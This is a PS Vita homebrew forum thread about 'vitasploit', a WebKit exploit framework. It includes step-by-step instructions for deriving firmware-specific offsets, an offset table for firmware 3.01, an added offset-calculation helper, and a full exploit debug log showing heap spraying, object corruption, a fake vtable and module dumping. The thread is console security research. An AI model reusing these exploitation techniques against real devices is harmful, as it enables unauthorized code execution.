
vitasploit - Exploitation Framework

Open discussions on programming specifically for the PS Vita.
Forum rules
Forum rule Nº 15 is strictly enforced in this subforum.
tomtomdu80
Buffer Overflow
Posts: 113
Joined: Tue Nov 20, 2012 6:39 pm
Location: France

Re: vitasploit - Exploitation Framework

Post by tomtomdu80 » Thu Nov 13, 2014 11:27 pm

Zecoxao wrote: this is the best thing the exploit has:

Code:

//libkernel_mem_test("mem", SCE_KERNEL_MEMBLOCK_TYPE_USER_RW, 0x1000);
in the end it'll allow the attacker to go to the kernel memory range, 0x81000000.
I don't really think Sony would allow you to read/write the kmem just by using a syscall like that :lol:

addddd
Posts: 9
Joined: Fri Jun 28, 2013 4:14 am

Re: vitasploit - Exploitation Framework

Post by addddd » Fri Nov 14, 2014 10:27 am

How to find offsets for other firmwares?

Code:

ver_offsets = {
    v3_00:{
        scewkbase_off : 0x3d73a9,
        scelibcentry_off: 0x6c4718,
I looked for it in the module import table, but there are no similar addresses. Maybe I need to add or subtract some base address?

Hykem
Guru
Posts: 75
Joined: Sat Jan 15, 2011 8:11 pm

Re: vitasploit - Exploitation Framework

Post by Hykem » Fri Nov 14, 2014 4:23 pm

Thanks for all the support! BBalling1 and tomtomdu80 are now part of the project as well, so "vitasploit" is now our common workplace for all public code regarding the exploit. This will avoid having several repositories scattered around and should provide a cleaner way to distribute new findings to other researchers.
yifanlu wrote:
Zecoxao wrote:
yifanlu wrote: I don't know what you mean by this but 1) the kernel is < 0x40000000 (technically it can be anywhere from 0 to 0xffffffff but this is a reasonable assumption for now), 2) 0x81000000 is the default base before ASLR, and 3) memalloc returns only user memory.
regarding 2), can you explain this to me? https://github.com/DHrpcs3/rpcs3/blob/m ... y.cpp#L135
Someone making an educated guess?
That was indeed an educated guess taken by DH.
Regarding that memory test, it obviously can't access the kernel memory space. Although the functions come from SceLibKernel (which may have sparked some confusion) all they do is allocate and free memory in the user area (whence the "TYPE_USER_RW" designation in the macro).
The main advantage in using this over the manual memory allocation method is the memory block types. We can ask the Vita to allocate memory contiguously for example. This may be useful in the future to store code payloads for further exploitation without messing too much with memory areas.
addddd wrote: How to find offsets for other firmwares?

Code:

ver_offsets = {
    v3_00:{
        scewkbase_off : 0x3d73a9,
        scelibcentry_off: 0x6c4718,
I looked for it in the module import table, but there are no similar addresses. Maybe I need to add or subtract some base address?
To find the offsets under different firmwares there are a few steps to follow:
- Run the tool in memory reading/writing mode and take note of the "leaked ptr" value. This is the memory pointer that gets leaked from SceWebKit and will be used as reference for the rest of the code;
- Find SceWebKit module manually using the "scanm" command on several addresses (use the ones from previous firmwares as references, since it should reside closely to them);
- "scewkbase_off" is now [leaked pointer address] - [SceWebKit module base address] (e.g.: 0x81DD73A9 - 0x81A00000 = 0x3D73A9);
- To resolve the offsets of the other libraries you must find them manually using "scanm". This will find modules in the memory and print out crucial information on them. You have to take note of each module's entry point;
- Disassemble SceWebKit module and search the code for each module's entry point address. You should find it being loaded like this:

Code:

0x820C139C:
MOV             R12, #0x8110FAFD (SceLibc entry point address)
BX              R12
Now look in SceWebKit's import module table for the reference to this routine:

Code:

0x820C4718:
DCD sub_820C139C
"sceXXXXXentry_off" is the offset inside WebKit where you find the import for each module, so it should be equal to [pointer to module entry point address] - [SceWebKit base address] (e.g.: 0x820C4718 - 0x81A00000 = 0x6C4718 for SceLibc);
- The last part is sceXXXXXbase_off which is simply the offset of each module's entry point inside themselves, which means [module entry point address] - [module base address] (e.g.: 0x8110FAFD - 0x81100000 = 0xFAFD for SceLibc);
- Don't bother with "elementvtable_off" and "setscrollleft_off" because it's very likely that these JavaScript objects always reside at the same offsets.

As you can see this is merely a way to find an automatic path to each module using SceWebKit as reference.
You may also need to build a new ROP chain in case the available gadgets reside at different offsets or are simply not available (like in 3.00 firmware, which required a different ROP chain for code execution).
I hope this helps, but feel free to contact me if you have any doubts.
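The offset bookkeeping from the steps above, as an added example that is not vitasploit's own code: it parses notes in the shape addddd posted for 3.01 (the sample text is constructed from this thread's figures), applies the three subtraction formulas, and refuses addresses that cannot be right. The mapping of module names to the `scelibc`/`scelibnet`/`scekern` key prefixes is taken from the ver_offsets table quoted in the thread; the `changedOffsets` helper for comparing against an older firmware's table is my own addition.

```javascript
// Added example (not vitasploit code); NOTES_3_01 is constructed from addddd's 3.01 figures in this thread.
const NOTES_3_01 = `
Leaked ptr: 0x81dd73a9
sceWebKit Base address: 0x81a00000
SceLibc
void ** func_entry_tab = 0x820c4718
MOV             R12, #0x8110FAFD
Base address: 0x81100000
SceNet
void ** func_entry_tab = 0x820c46e4
MOV             R12, #0xE01D52D9
Base address: 0xe01d3000
SceLibKernel
void ** func_entry_tab = 0x820c46f4
MOV             R12, #0xE000B291
Base address: 0xe0003000
`;
// Key prefixes as the ver_offsets table in the thread spells them.
const KEY_PREFIX = { SceLibc: "scelibc", SceNet: "scelibnet", SceLibKernel: "scekern" };
// Parse the notes into { leakedPtr, webkitBase, modules: [{ name, importPtr, entry, base }] }.
function parseNotes(text) {
  const notes = { leakedPtr: null, webkitBase: null, modules: [] };
  let cur = null;  // module block currently being filled
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (!line) continue;
    let m;
    if ((m = /^Leaked ptr:\s*(0x[0-9a-f]+)$/i.exec(line))) notes.leakedPtr = Number(m[1]);
    else if ((m = /^sceWebKit Base address:\s*(0x[0-9a-f]+)$/i.exec(line))) notes.webkitBase = Number(m[1]);
    else if (/^Sce\w+$/.test(line)) notes.modules.push((cur = { name: line }));
    else if (!cur) throw new Error("address line before any module name: " + line);
    else if ((m = /^void \*\* func_entry_tab = (0x[0-9a-f]+)$/i.exec(line))) cur.importPtr = Number(m[1]);
    else if ((m = /^MOV\s+R12,\s*#(0x[0-9a-f]+)$/i.exec(line))) cur.entry = Number(m[1]);
    else if ((m = /^Base address:\s*(0x[0-9a-f]+)$/i.exec(line))) cur.base = Number(m[1]);
    else throw new Error("unrecognised line: " + line);
  }
  return notes;
}
// Apply the three formulas from the post: scewkbase_off, sceXXXentry_off and sceXXXbase_off.
function deriveOffsets(notes) {
  const wk = notes.webkitBase;
  const out = { scewkbase_off: notes.leakedPtr - wk };
  for (const mod of notes.modules) {
    const p = KEY_PREFIX[mod.name];
    if (!p) throw new Error("no ver_offsets key known for " + mod.name);
    // Import slot lies inside SceWebKit, entry point inside its own module: both differences must be positive.
    if (mod.importPtr <= wk || mod.entry <= mod.base) throw new Error("bad addresses for " + mod.name);
    out[p + "entry_off"] = mod.importPtr - wk;   // import slot offset inside SceWebKit
    out[p + "base_off"] = mod.entry - mod.base;  // entry point offset inside the module
  }
  return out;
}
// Keys of a reference table (e.g. v3_00) whose value differs in the derived one.
const changedOffsets = (ref, got) => Object.keys(got).filter((k) => k in ref && ref[k] !== got[k]);
```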

addddd
Posts: 9
Joined: Fri Jun 28, 2013 4:14 am

Re: vitasploit - Exploitation Framework

Post by addddd » Sun Nov 16, 2014 7:56 pm

Thanks for the explanations! On firmware 3.01 I got these values:

Code:

Leaked ptr: 0x81dd73a9
sceWebKit Base address: 0x81a00000

SceLibc
void ** func_entry_tab = 0x820c4718
MOV             R12, #0x8110FAFD
Base address: 0x81100000

SceNet
void ** func_entry_tab = 0x820c46e4
MOV             R12, #0xE01D52D9
Base address: 0xe01d3000

SceLibKernel
void ** func_entry_tab = 0x820c46f4
MOV             R12, #0xE000B291
Base address: 0xe0003000
and the calculated offsets are:

Code:

        v3_01:{
            scewkbase_off : 0x3d73a9, //[leaked pointer address] - [SceWebKit module base address]
            scelibcentry_off: 0x6c4718, //[pointer to module entry point address] - [SceWebKit base address]
            scelibnetentry_off: 0x6c46e4,
            scekernentry_off: 0x6c46f4,
            scekernbase_off: 0x8291, //[module entry point address] - [module base address]
            scelibcbase_off: 0xfafd,
            scelibnetbase_off: 0x22d9,
            elementvtable_off: -0x68, //
            setscrollleft_off: 0x5b
        },
The other values were taken from 3.00.
[+] DBG: Initialization
[+] DBG: Spraying ArrayBuffers...
[+] DBG: Done spraying
[+] DBG: Searching for ArrayBuffer signature...
[+] DBG: ...
[+] DBG: Found ArrayBuffer signature at u32[0x5c0c] -> 0x8a22c538
[+] DBG: Spraying Elements...
[+] DBG: Done spraying
[+] DBG: Searching for Element signature...
[+] DBG: ...
[+] DBG: Found Element signature at u32[0x5b56]
[+] DBG: Changing size of Element object: 0x66656463 -> 0x55555555
[+] DBG: Looking for modified Element object...
[+] DBG: Found modified Element object at esprays[0x8]
[+] DBG: Changing size of object: 0xabc0 -> 0xdeadbabe
[+] DBG: Looking for modified object...
[+] DBG: Found modified object at sprays[0xace]
[+] DBG: Address of u32: 0x82ad8a40
[+] DBG: Base of u32: 0x82ad8610
[+] DBG: Vtab of u32: 0x82234444
[+] DBG: Leaked ptr: 0x81dd73a9
[+] DBG: SceWebKit base: 0x81a00000
[+] DBG: SceLibc base: 0x81100000
[+] DBG: SceNet base: 0xe01d3000
[+] DBG: SceLibKernel base: 0xe0003000

[+] DBG: Element vtable pointer at: 0x82aef300
[+] DBG: Element vtable at: 0x822b22f0
[+] DBG: Fake vtable at: 0x826d8610
[+] DBG: Copying vtable...

[+] DBG: Module UIDs:
826DE610 6F010140 69010140 59010140 4D010140 o..@i..@Y..@M..@
826DE620 47010140 31010140 2D010140 25010140 G..@1..@-..@%..@
826DE630 23000140 21000140 1F000140 1D000140 #..@!..@...@...@
826DE640 1B000140 19000140 17000140 15000140 ...@...@...@...@
826DE650 13000140 11000140 0F000140 0D000140 ...@...@...@...@
826DE660 0B000140 01000140 ...@...@

[+] DBG: Found module: SceWebKit
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81a00000
[+] DBG: Module segment memsz: 0x8ea860
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x81188000
[+] DBG: Module segment memsz: 0xc7cc
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceHafnium
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81880000
[+] DBG: Module segment memsz: 0x56668
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x8103e000
[+] DBG: Module segment memsz: 0x54
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: ScePsp2Compat
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81200000
[+] DBG: Module segment memsz: 0x3b0a70
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x81168000
[+] DBG: Module segment memsz: 0xb944
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceWebFiltering
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81158000
[+] DBG: Module segment memsz: 0x5920
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x81160000
[+] DBG: Module segment memsz: 0x4d64
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibVitaJSExtObj
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x810cc000
[+] DBG: Module segment memsz: 0x4d3c
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x8103d000
[+] DBG: Module segment memsz: 0x78
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibHttp
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe05e0000
[+] DBG: Module segment memsz: 0x1c440
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe004b000
[+] DBG: Module segment memsz: 0x630
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibNetCtl
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe01eb000
[+] DBG: Module segment memsz: 0x7aae
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe004c000
[+] DBG: Module segment memsz: 0x1400
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceNet
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe01d3000
[+] DBG: Module segment memsz: 0xbdf0
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe004a000
[+] DBG: Module segment memsz: 0xc90
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceAppUtil
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81090000
[+] DBG: Module segment memsz: 0x96a4
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x81039000
[+] DBG: Module segment memsz: 0x70
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibPvf
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0090000
[+] DBG: Module segment memsz: 0xcf24
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0027000
[+] DBG: Module segment memsz: 0x8
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibft2
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0108000
[+] DBG: Module segment memsz: 0x4db54
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0026000
[+] DBG: Module segment memsz: 0x2f4
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibDbg
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0044000
[+] DBG: Module segment memsz: 0x5d4
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0025000
[+] DBG: Module segment memsz: 0x8c
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceCommonDialog
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0190000
[+] DBG: Module segment memsz: 0x11108
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0032000
[+] DBG: Module segment memsz: 0x289
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceShellSvc
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe00d0000
[+] DBG: Module segment memsz: 0x12000
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0031000
[+] DBG: Module segment memsz: 0x8e9
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibc
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81100000
[+] DBG: Module segment memsz: 0x4d3bc
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x8103a000
[+] DBG: Module segment memsz: 0x26f0
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibFios2
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x810a0000
[+] DBG: Module segment memsz: 0x2b12c
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x81084000
[+] DBG: Module segment memsz: 0x523d
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceGxm
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0064000
[+] DBG: Module segment memsz: 0x1fe44
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0016000
[+] DBG: Module segment memsz: 0x72c
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceGpuEs4User
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe003d000
[+] DBG: Module segment memsz: 0x2844
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0015000
[+] DBG: Module segment memsz: 0x3c
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceAvcodecUser
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0035000
[+] DBG: Module segment memsz: 0x2340
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceDriverUser
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0018000
[+] DBG: Module segment memsz: 0xc334
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0028000
[+] DBG: Module segment memsz: 0x8f50
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibKernel
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0003000
[+] DBG: Module segment memsz: 0xdb58
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0014000
[+] DBG: Module segment memsz: 0x50
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceWebKitProcess
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81000000
[+] DBG: Module segment memsz: 0x151c0
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x81016000
[+] DBG: Module segment memsz: 0x215cc
[+] DBG: Error: Bad module segment!
[+] DBG: SceWebKitProcess base: 0x81000000
[+] DBG: SceCommonDialog base: 0xe0190000
[+] DBG: - Memory test -
[+] DBG: Allocated memory UID: 0x40010db5
[+] DBG: Memory base pointer: 0x826deef8
[+] DBG: Freed memory UID: 0x40010db5
[+] DBG: - Socket connection test -
[+] DBG: Calling nethtons()
[+] DBG: -> 0x4e15

[+] DBG: Calling SceNetSocket()
[+] DBG: -> 0x47

[+] DBG: Calling SceNetConnect()
[+] DBG: -> 0x0

[+] DBG: Calling SceNetSend()
[+] DBG: -> 0x1b

[+] DBG: Calling SceNetClose()
[+] DBG: -> 0x0

[+] DBG: - Directory listing test -
[+] DBG: Listing: app0:
[+] DBG: eboot.bin
[+] DBG: sce_sys
[+] DBG: -

[+] DBG: Listing: app0:sce_sys/
[+] DBG: param.sfo
[+] DBG: -

[+] DBG: - File retrieval test -
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0xd6a
-
Some errors appear on module dumping.

Hykem
Guru
Posts: 75
Joined: Sat Jan 15, 2011 8:11 pm

Re: vitasploit - Exploitation Framework

Post by Hykem » Tue Nov 18, 2014 5:44 pm

Thanks addddd!
So, only SceNet's offsets change. I'll add this to vitasploit.

Also, those errors can be ignored, they currently have no meaning and I'll remove them.

Xeeynamo
Posts: 25
Joined: Fri Feb 24, 2012 6:33 pm
Location: Italy

Re: vitasploit - Exploitation Framework

Post by Xeeynamo » Wed Nov 19, 2014 1:33 am

Hi, I'm doing some tests and, with ROP enabled, it keeps reloading index.html until a stroke of luck. Is that normal? Is there a way to minimize crashes?

Hykem
Guru
Posts: 75
Joined: Sat Jan 15, 2011 8:11 pm

Re: vitasploit - Exploitation Framework

Post by Hykem » Wed Nov 19, 2014 9:43 pm

I've just updated vitasploit with support for firmware 3.01 (thanks to addddd), improved module dumping, "run" command (thanks to Mr. Netrix) and a new test for support URI calls (thanks to tomtomdu80).
The URI calls are what's used in the PKG Installer trick, so "run support_uri("psgm:open?titleid=NPXS10031")" should open the PKG Installer for example.
Xeeynamo wrote: Hi, I'm doing some tests and, with ROP enabled, it keeps reloading index.html until a stroke of luck. Is that normal? Is there a way to minimize crashes?
Unfortunately, that's quite normal. ASLR forces us to scan the memory every time we exploit the vulnerability, so it takes a few attempts before we successfully find the modified objects.

niszczycielnpc
Posts: 259
Joined: Thu Dec 19, 2013 12:10 pm
Location: %appdata%/Poland/Netherland

Re: vitasploit - Exploitation Framework

Post by niszczycielnpc » Thu Nov 20, 2014 12:49 pm

Can we only retrieve files from the PS Vita or can we send files too?

Xeeynamo
Posts: 25
Joined: Fri Feb 24, 2012 6:33 pm
Location: Italy

Re: vitasploit - Exploitation Framework

Post by Xeeynamo » Thu Nov 20, 2014 1:38 pm

niszczycielnpc wrote: Can we only retrieve files from the PS Vita or can we send files too?
It's possible but it's useless. The SceWebKit process can read only from app0, savedata0 and vs0, but it can write only to savedata0 due to its user-mode privileges. We need a kernel exploit in order to get r/w access to more partitions. Also, the current dumps save data from RAM, not from NAND.
Correct me if I'm wrong about something.

niszczycielnpc
Posts: 259
Joined: Thu Dec 19, 2013 12:10 pm
Location: %appdata%/Poland/Netherland

Re: vitasploit - Exploitation Framework

Post by niszczycielnpc » Thu Nov 20, 2014 3:32 pm

So the eboot.bin in app0 is just the eboot from the website application?
